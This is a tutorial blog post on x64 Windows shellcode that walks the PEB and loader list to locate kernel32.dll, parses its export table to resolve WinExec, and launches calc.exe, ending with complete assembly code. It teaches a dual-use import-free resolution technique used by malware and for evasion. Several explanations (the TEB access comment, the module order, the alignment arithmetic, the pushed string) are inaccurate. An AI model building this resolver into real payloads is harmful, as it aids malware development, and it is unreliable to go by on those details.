Table of Contents
- What's this about?
- Who's this for?
- Must Know Concepts (Before You Dive In)
- Why It Matters in Shellcoding?
- Windows x64 Calling Convention
- Understanding Stack Alignment in x64 (Why 16 Byte Matters?) What Are We Going to Perform?
- Accessing PEB (Process Environment Block)
- Walking LDR to Locate kernel32.dll
- Getting into Export Table
- Getting Address of WinExec()
- Executing WinExec
- Complete Code
Whats this about?
In this blog, we’ll walk through crafting shellcode that locates and calls WinExec("calc.exe", 1)
entirely without relying on imported functions. Instead, we’ll manually resolve kernel32.dll
and locate WinExec
by navigating the process's memory structures.
This technique mirrors real-world malware behavior and is widely used in shellcode payloads, and CTF challenges. We’ll break down each part of the code so you understand how it works and why it works.
Who's this for?
This post is intended for:
- Intermediate to advanced developers learning x64 assembly
- CTF participants working with custom shellcode
- Anyone curious about how to access Windows API functions manually
You don’t need to be an expert in reverse engineering, but a basic understanding of registers, memory layout, and the PE file structure will help a lot.
Must Know Concepts (Before You Dive In)
In shellcoding and low-level assembly (especially x86 and x86_64), the terms byte, word, double word, and quad word (qword) describe the size of data being operated on. These sizes map directly to registers and instructions, and understanding them is critical when crafting shellcode.
Term | Size | Bits | Used in Registers Like |
---|---|---|---|
Byte | 1 byte | 8 |
AL , BL , CL , DL
|
Word | 2 bytes | 16 |
AX , BX , CX , DX
|
Dword | 4 bytes | 32 |
EAX , EBX , ECX , EDX
|
Qword | 8 bytes | 64 |
RAX , RBX , RCX , RDX
|
Register | Bits | Description |
---|---|---|
RAX |
64 | Quad word |
EAX |
32 | Lower 32 bits of RAX |
AX |
16 | Lower 16 bits of EAX |
AH |
8 | High byte of AX |
AL |
8 | Low byte of AX |
Why It Matters in Shellcoding?
Shellcode is highly size-conscious. Each instruction must:
Fit within strict size constraints.
Use correct data sizes to avoid buffer overflows or misalignment.
Align with syscall conventions (e.g., arguments in rdi, rsi, etc., are 64-bit for x86_64).
Example:
1.Moving Imediate Data:
mov al, 0x41 ; Move 1 byte to AL
mov ax, 0x4142 ; Move 2 bytes to AX
mov eax, 0x41424344 ; Move 4 bytes to EAX
mov rax, 0x4142434445464748 ; Move 8 bytes to RAX
2.Stack Operations (ESP/RSP):
push eax ; pushes a dword (4 bytes)
push rax ; pushes a qword (8 bytes)
Windows x64 Calling Convention
The Windows x64 Calling Convention (used in 64-bit Windows) defines how functions receive parameters, return values, and manage the stack. It’s crucial for shellcoding, reverse engineering, and writing assembly that interacts with Windows APIs.
Aspect | Rule/Usage |
---|---|
Register Arguments | First 4 arguments: RCX , RDX , R8 , R9
|
Return Value | Returned in RAX
|
Shadow Space | 32 bytes (4×8 bytes) must be reserved by the caller |
Stack Alignment | Stack (RSP ) must be 16-byte aligned before call
|
Rest of Arguments | Passed on the stack (right to left) |
Caller-saved regs |
RAX , RCX , RDX , R8–R11
|
Callee-saved regs |
RBX , RBP , RDI , RSI , R12–R15 , RSP
|
Param Position | Register | Notes |
---|---|---|
1st argument | RCX |
|
2nd argument | RDX |
|
3rd argument | R8 |
|
4th argument | R9 |
|
5th+ arguments | Stack | Right to left order (like C) |
example :
MessageBoxA(NULL, "Hi", "Title", MB_OK);
Assembly(simplified) :
mov rcx, 0 ; HWND hWnd = NULL
mov rdx, str_hi ; LPCSTR lpText
mov r8, str_title ; LPCSTR lpCaption
mov r9d, 0x0 ; UINT uType = MB_OK
sub rsp, 0x28 ; shadow space + align
call MessageBoxA
add rsp, 0x28
Understanding Stack Alignment in x64 (Why 16 Byte Matters?)
What Is 16-Byte Alignment?
In 64-bit Windows (and Linux), the stack pointer (RSP) must be aligned to a 16-byte (0x10) boundary before calling a function. This is required by the x64 calling convention.
Meaning:
The value in the RSP register should always be divisible by 16 (RSP % 16 == 0) when a call instruction is made.
Why Is This Important?
Misalignment may cause crashes, performance penalties, or incorrect behavior.
Windows functions and syscalls may fail silently or crash if the stack is misaligned.
Example of Aligned Stack:
Let's say RSP = 0x00000000001FFFD0 — that's 16-byte aligned.
If you do:
call SomeFunction
Then internally, the call pushes the return address (8 bytes), making RSP:
RSP = RSP - 8 = 0x00000000001FFFC8
Now RSP is NOT aligned (RSP % 16 == 8) during the function execution.
Correcting This: Stack Alignment Before call
To maintain alignment inside the called function, you need to adjust before the call:
Rule of Thumb:
Ensure RSP is 16-byte aligned BEFORE a call, so that after call (which pushes return address), it becomes misaligned by 8 bytes, which is what's expected inside the function.
Example in Shellcode (Manual Stack Setup)
Imagine you're writing shellcode and want to call a function (e.g., WinExec):
sub rsp, 0x28 ; Allocate space & align
call WinExec
add rsp, 0x28 ; Clean up the stack
Why 0x28 (40 bytes)? Because:
32 bytes (shadow space, required by Microsoft x64 calling convention)
+8 bytes to fix alignment (so after call, it's back to aligned)
What Happens If Misaligned?
If you do:
sub rsp, 8
call SomeFunc
And RSP was already aligned, now RSP % 16 == 8 BEFORE the call, so during the function, it becomes %16 == 0 (aligned).
That violates the convention. Stack alignment is off inside the function. This can crash on systems using movaps, call printf, etc.
Visual Summary:
Step | RSP Value | RSP % 16 |
---|---|---|
Initial | 0x...D0 |
0 |
sub rsp, 0x28 |
0x...A8 |
8 |
call (push ret) |
0x...A0 |
0 aligned during function |
In Shellcoding
When writing shellcode:
Always ensure 16-byte alignment before calling any function.
When doing syscall, alignment is usually less critical, but still good practice.
Avoiding stack misalignment helps with compatibility, especially on Windows Defender-protected or DEP-enabled systems.
What Are We Going to Perform?
We're going to manually invoke WinExec("calc.exe", SW_SHOWNORMAL)on a 64-bit Windows system without using imports, by resolving WinExec
manually.
#include <windows.h>
int main() {
// Launch calculator
WinExec("calc.exe", SW_SHOWNORMAL);
return 0;
}
On Linux, you’d resolve syscalls. On Windows, this means manually resolving WinExec
from the export table of kernel32.dll
.
This can be achieved by :
Step | Purpose |
---|---|
1 | Access PEB via gs:[0x60]
|
2 | Walk loader data to find kernel32.dll base |
3 | Locate Export Directory |
4 | Search for "WinExec" in Export Names |
5 | Get function address via Ordinal and Address table |
6 | Push calc.exe and call WinExec
|
Accessing PEB (Process Environment Block)
To access the PEB (Process Environment Block), we first need to access the TEB (Thread Environment Block), because the TEB structure contains a pointer to the PEB:
typedef struct _TEB64 {
NT_TIB64 NtTib; // 0x0000
PVOID EnvironmentPointer; // 0x0038
CLIENT_ID64 ClientId; // 0x0040
PVOID ActiveRpcHandle; // 0x0050
PVOID ThreadLocalStoragePointer; // 0x0058
PPEB64 ProcessEnvironmentBlock; // 0x0060
ULONG LastErrorValue; // 0x0068
ULONG CountOfOwnedCriticalSections; // 0x006C
PVOID CsrClientThread; // 0x0070
PVOID Win32ThreadInfo; // 0x0078
ULONG User32Reserved[26]; // 0x0080
ULONG UserReserved[5]; // 0x00E8
PVOID WOW32Reserved; // 0x0100
ULONG CurrentLocale; // 0x0108
ULONG FpSoftwareStatusRegister; // 0x010C
PVOID SystemReserved1[54]; // 0x0110
LONG ExceptionCode; // 0x02C0
PVOID ActivationContextStackPointer; // 0x02C8
BYTE SpareBytes1[24]; // 0x02D0
PVOID TxFsContext; // 0x02E8
GDI_TEB_BATCH64 GdiTebBatch; // 0x02F0
CLIENT_ID64 RealClientId; // 0x04D8
PVOID GdiCachedProcessHandle; // 0x04E8
ULONG GdiClientPID; // 0x04F0
ULONG GdiClientTID; // 0x04F4
PVOID GdiThreadLocalInfo; // 0x04F8
ULONGLONG Win32ClientInfo[62]; // 0x0500
PVOID glDispatchTable[233]; // 0x06F0
ULONGLONG glReserved1[29]; // 0x10D8
PVOID glReserved2; // 0x1168
PVOID glSectionInfo; // 0x1170
PVOID glSection; // 0x1178
PVOID glTable; // 0x1180
PVOID glCurrentRC; // 0x1188
PVOID glContext; // 0x1190
ULONG LastStatusValue; // 0x1198
UNICODE_STRING StaticUnicodeString; // 0x11A0
WCHAR StaticUnicodeBuffer[261]; // 0x11B0
PVOID DeallocationStack; // 0x13C8
PVOID TlsSlots[64]; // 0x13D0
LIST_ENTRY TlsLinks; // 0x15D0
PVOID Vdm; // 0x15E0
PVOID ReservedForNtRpc; // 0x15E8
PVOID DbgSsReserved[2]; // 0x15F0
ULONG HardErrorMode; // 0x1600
// ... additional fields follow
} TEB64, *PTEB64;
From the above structure, we can see that the PEB is located at offset 0x60 in the TEB.
How Do We Access the TEB?
On Windows x64, the TEB
is accessible via the GS
segment register. Here's how it looks in assembly:
xor rcx , rcx
mov rbx , gs:[rcx+0x00] //TEB
mov rbx , gs:[rcx+0x60] //PEB
You can also simplify this if you’re directly interested in the PEB
:
xor rcx , rcx
mov rbx , gs:[rcx + 0x60] //PEB
Walking ldr to Locate kernel32.dll
To locate kernel32.dll
, we need to understand the structure of LIST_ENTRY, which is a doubly linked list used by Windows to track loaded modules:
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink; // Forward link
struct _LIST_ENTRY *Blink; // Backward link
} LIST_ENTRY, *PLIST_ENTRY;
Each module loaded by the process such as ntdll.dll
, kernel32.dll
, user32.dll
, and others are part of this linked list.
All DLLs(modules) loaded by the process has a sequence like:
ntdll.dll
kernel32.dll
user32.dll
any other dependent/shared libraries
Our 2nd module is kernel32.dll
.
To access this module we need to access InMemoryOrderModuleList
, but the default module is 0 so we need to flink
in order to traverse forward to kernel32.dll
.
InMemoryOrderModuleList
can be access via these chain:
InMemoryOrderModuleList <- ldr <- PEB <- TEB
We've already accessed the PEB. Now let’s look at the PEB structure to locate Ldr:
PEB64 Structure:
typedef struct _PEB {
BYTE InheritedAddressSpace; // 0x000
BYTE ReadImageFileExecOptions; // 0x001
BYTE BeingDebugged; // 0x002
BYTE BitField; // 0x003
ULONG Padding0; // 0x004 (alignment padding)
PVOID Mutant; // 0x008
PVOID ImageBaseAddress; // 0x010 -> Base address of the main module
PVOID Ldr; // 0x018 -> Pointer to PEB_LDR_DATA
// ... you said stop here
} PEB, *PPEB;
The offset of ldr
is 0x018.
calculation:
offset = 1 * 4 + 4 + 8(pointer size in 64 bit) * 2 = 24 // 0x018
####ldr structure :
typedef struct _PEB_LDR_DATA {
ULONG Length; // 0x00
BOOLEAN Initialized; // 0x04
BYTE Reserved1[3]; // 0x05 - padding
PVOID SsHandle; // 0x08
LIST_ENTRY InLoadOrderModuleList; // 0x10
LIST_ENTRY InMemoryOrderModuleList; // 0x20
LIST_ENTRY InInitializationOrderModuleList; // 0x30
// ... More fields exist but usually not needed
} PEB_LDR_DATA, *PPEB_LDR_DATA;
LIST_ENTRY being doubly link list containing two pointer has size 16 , so the offset of InMemoryOrderModuleList
can be calculated as :
offset = 4 + 1 + 3 + 8 + 16 = 32 //0x20
conclusion :
-
ldr
is at 0x18 -
InMemoryOrderModuleList
is at 0x20
which can be interpreted as :
mov rbx , [rbx + 0x18] ;ldr
mov rbx , [rbx + 0x20] ;InMemoryOrderModuleList
now we are currently at 0th module of process, to traverse to kernel32.dll
we need flink
in this way:
InMemoryOrderModuleList.flink.flink //kernel32.dll
which looks like :
mov rbx , [rbx]
mov rbx , [rbx]
But for now, we are just pointing to the kernel32.dll
module specifically its InLoadOrderLinks
(the first entry in the module list). To proceed further, we need the module's base address, which can be accessed via the DllBase
field contained in the module structure we are currently referencing.
typedef struct _LDR_DATA_TABLE_ENTRY {
LIST_ENTRY InLoadOrderLinks; // +0x00
LIST_ENTRY InMemoryOrderLinks; // +0x10
LIST_ENTRY InInitializationOrderLinks; // +0x20
PVOID DllBase; // +0x30 ← This is the base address
...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
To access DllBase
, we need to jump +0x20 (32 bytes) from the current offset.
This can be done using:
mov r8 , [rbx+0x20]
At this point, r8 contains the base address of kernel32.dll
.
Memory Walk Visualized:
GS:[0x00] → TEB
+0x60 → PEB
+0x18 → Ldr (PEB_LDR_DATA)
+0x20 → InMemoryOrderModuleList
↓ Flink
→ kernel32.dll module entry
+0x30 → DllBase
Visualising the Memory Layout (TEB → PEB → LDR → Module → DllBase)
+--------------------------+
| GS Segment |
+--------------------------+
↓
+--------------------------+
| TEB (at GS:[0]) |
| +0x60 → PEB |
+--------------------------+
↓
+--------------------------+
| PEB |
| +0x18 → Ldr |
+--------------------------+
↓
+--------------------------+
| PEB_LDR_DATA |
| +0x20 → InMemoryOrderModuleList (LIST_ENTRY)
+--------------------------+
↓
+--------------------------+
| LIST_ENTRY (1st module) | → ntdll.dll
| LIST_ENTRY (2nd module) | → kernel32.dll
+--------------------------+
↓
+--------------------------+
| LDR_DATA_TABLE_ENTRY | ← We're here after two `.Flink` jumps
| +0x30 → DllBase | ← base of kernel32.dll
+--------------------------+
Why Do We Need DllBase?
We use DllBase
to manually parse the Export Table of kernel32.dll
, locate functions like WinExec
, and call them directly without relying on imports — crucial in shellcode and evasion techniques.
Getting into Export Table
Our next step is to access the Export Table of kernel32.dll
in order to retrieve information about the WinAPI
functions it exports.
To navigate to the Export Table, follow this pointer chain:
Export Table <- PE hdrs offset <- DOS Header
Accessing the DOS Header
We don’t need to do anything extra because:
When a PE (Portable Executable) file like a DLL or EXE is loaded into memory:
The DLL base address (also called ImageBase) points to the beginning of the loaded image in memory.
The DOS header (IMAGE_DOS_HEADER) starts exactly at that base address.
Memory Layout:
DLLBase
│
├─> 0x00: DOS Header ('MZ' = 0x5A4D)
│ └─> 0x3C: e_lfanew (DWORD) → offset to PE Header
│
├─> DLLBase + e_lfanew → PE Header ('PE\0\0')
│ └─> +0x18: Optional Header
│ └─> +0x70: DataDirectory[0] (Export Table RVA + Size)
DOS Header structure :
typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
WORD e_magic; // Magic number: "MZ" (0x5A4D)
WORD e_cblp; // Bytes on last page of file
WORD e_cp; // Pages in file
WORD e_crlc; // Relocations
WORD e_cparhdr; // Size of header in paragraphs
WORD e_minalloc; // Minimum extra paragraphs needed
WORD e_maxalloc; // Maximum extra paragraphs needed
WORD e_ss; // Initial (relative) SS value
WORD e_sp; // Initial SP value
WORD e_csum; // Checksum
WORD e_ip; // Initial IP value
WORD e_cs; // Initial (relative) CS value
WORD e_lfarlc; // File address of relocation table
WORD e_ovno; // Overlay number
WORD e_res[4]; // Reserved words
WORD e_oemid; // OEM identifier (for e_oeminfo)
WORD e_oeminfo; // OEM information; e_oemid specific
WORD e_res2[10]; // Reserved words
LONG e_lfanew; // File address of new exe header (PE Header offset)
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
Actual picture with steps :
Accessing the Export Table
Note:Every entry in the DOS Header is relative to the base of kernel32.dll
, i.e., it uses RVA (Relative Virtual Address).
To convert an RVA to a VA (Virtual Address), add the base address of the module (DllBase
)
Step 1: Get PE Header Offset via e_lfanew
mov edx , [r8 + 0x3c] //RVA of PE Header
lea rdx , [rdx + r8] //VA of PE Header
Now we know that Export Table is at offset +0x88 from PE Header.
Step 2: Get RVA of Export Table from PE Header
xor rcx , rcx
mov cl , 0x88
mov edx , [rdx + rcx] //RVA of Export Table
lea rdx , [rdx + r8] //VA of Export Table
Getting Address of WinExec
Now that we've handled the complex part—parsing the PE headers and finding the export table—it's time to resolve the address of the WinExec
function, which is comparatively simpler.
Structure of Export Table
typedef struct _IMAGE_EXPORT_DIRECTORY {
DWORD Characteristics; // 0x00 - Reserved, usually zero
DWORD TimeDateStamp; // 0x04 - Timestamp of export table creation
WORD MajorVersion; // 0x08 - Major version number
WORD MinorVersion; // 0x0A - Minor version number
DWORD Name; // 0x0C - RVA of DLL name (ASCII string)
DWORD Base; // 0x10 - Starting ordinal number (usually 1)
DWORD NumberOfFunctions; // 0x14 - Total number of function addresses
DWORD NumberOfNames; // 0x18 - Number of named exports
DWORD AddressOfFunctions; // 0x1C - RVA of DWORD array of function RVAs
DWORD AddressOfNames; // 0x20 - RVA of DWORD array of function name RVAs
DWORD AddressOfNameOrdinals; // 0x24 - RVA of WORD array of ordinals
} IMAGE_EXPORT_DIRECTORY;
Steps to Resolve WinExec Address
1.Get the ordinal index of WinExec
via AddressOfNames (+0x20).
2.Get the actual function index via AddressOfNameOrdinals (+0x24) using the ordinal index.
3.Resolve the function's RVA via AddressOfFunctions (+0x1C) and add base to get VA.
Step 1: Finding the Function Name WinExec
Registers Used:
rdx = base address of Export Table (i.e., pointer to IMAGE_EXPORT_DIRECTORY)
r8 = DLL base address (e.g., base of
kernel32.dll
)rsi = will point to array of function name RVAs (i.e., AddressOfNames)
rcx = index counter for loop
rax/eax = temp register for reading name RVA and checking characters
mov esi, [rdx + 0x20] ; Get RVA of AddressOfNames → esi
lea rsi, [rsi + r8] ; Convert RVA to actual address → rsi = AddressOfNames[]
Loop through the names:
xor rcx, rcx ; Clear loop index
Find_next:
mov eax, [rsi + rcx * 4] ; Get RVA of name at index rcx
add rax, r8 ; Convert RVA to actual address → rax = &function_name
Compare with WinExec
(manual byte match):
cmp dword [rax], 0x456e6957 ; Compare first 4 bytes → "WinE"
jnz next ; Not match? Go to next
cmp word [rax + 4], 0x6578 ; Compare next 2 bytes → "xe"
jnz next
cmp byte [rax + 6], 0x63 ; Compare last byte → "c"
jnz next
jmp found ; Match found → jump to found
"WinExec" = 'W' 'i' 'n' 'E' 'x' 'e' 'c'
In little-endian:
"WinE" → 0x456e6957
"xe" → 0x6578
'c' → 0x63
If not matched:
next:
inc rcx ; Try next function name
jmp Find_next ; Loop
found: ;Got the Ordinal Index
; rcx now holds the index of "WinExec"
The above code loops through exported function names in a DLL and finds the one named WinExec
, character-by-character using binary comparison.
Step 2: Get Ordinal Index
mov esi, [rdx + 0x24] ; offset 0x24 = AddressOfNameOrdinals RVA
add rsi, r8 ; convert RVA to VA → rsi = &NameOrdinals[0]
movzx ecx, word [rsi + rcx * 2] ; get ordinal index for WinExec
This gets the ordinal of the function WinExec
using the same index (rcx) used in the name array.
Step 3: Get Function Address
mov esi, [rdx + 0x1c] ; offset 0x1C = AddressOfFunctions RVA
movsxd rsi, esi
add rsi, r8 ; convert RVA to VA → rsi = &FunctionAddresses[0]
mov eax, [rsi + rcx * 4] ; get RVA of function using ordinal index
movsxd r9, eax
add r9, r8 ; r9 = actual address of WinExec
Now, r9 contains the actual memory address of WinExec()
Executing WinExec()
We now have the address of WinExec
, and it's time to execute it using proper calling convention.
1.Shadow Space Allocation
sub rsp, 40
Windows x64 calling convention requires 32 bytes of shadow space, plus alignment.
2.Pushing the String calc.exe
push 0x6578652e ; ".exe"
push 0x636c6163 ; "calc"
This results in the string "calc.exe" at rsp.
3.Setup Arguments for WinExec
mov rcx, rsp
Why:
On Windows x64, the first argument to a function is passed in RCX.
rcx = rsp now points to the string
calc.exe
(first argument to WinExec).
xor rdx, rdx
inc rdx ; SW_SHOWNORMAL
Why:
- Clears rdx and sets it to 1 → this is the second argument to WinExec, which expects:
UINT uCmdShow = 1; // SW_SHOWNORMAL
4.Call WinExec
call r9
Done! You've just launched calc.exe
using raw shellcode—no imports, no API stubs, just pure reverse engineering.
Complete Code:
section .text
global _start
_start:
xor rcx , rcx
mov rbx , gs:[rcx + 0x60]
mov rbx , [rbx + 0x18]
mov rbx , [rbx + 0x20]
mov rbx , [rbx]
mov rbx , [rbx]
mov r8 , [rbx + 0x20]
; r8 = kernel32.dll
mov edx , [r8 + 0x3c]
lea rdx , [rdx + r8]
xor ecx , ecx
mov cl , 0x88
mov edx , [rdx + rcx]
lea rdx , [rdx + r8]
mov esi , [rdx + 0x20]
lea rsi , [rsi + r8]
;rdx = base of Exporttable
xor rcx , rcx
Find_next:
mov eax , [rsi + rcx * 4]
add rax , r8
cmp dword [rax] , 0x456e6957
jnz next
cmp word [rax + 4] , 0x6578
jnz next
cmp byte [rax + 6] , 0x63
jnz next
jmp found
next:
inc rcx
jmp Find_next
found:
;get ordinal table
mov esi , [rdx + 0x24]
add rsi , r8
movzx ecx , word [rsi + rcx * 2]
;Get address of WinExec
mov esi , [rdx + 0x1c]
movsxd rsi , esi
add rsi , r8
mov eax, [rsi + rcx * 4]
movsxd r9 , eax
add r9 , r8
;r9 : addres of WinExec
sub rsp , 40
push 0x6578652e ;'.exe'
push 0x636c6163 ; 'calc'
mov rcx , rsp
xor rdx , rdx
inc rdx
call r9
With the kernel32.dll
base address in hand, we're now ready to traverse the PE structure and uncover the Export Table — the key to resolving WinAPI functions at runtime.
Top comments (0)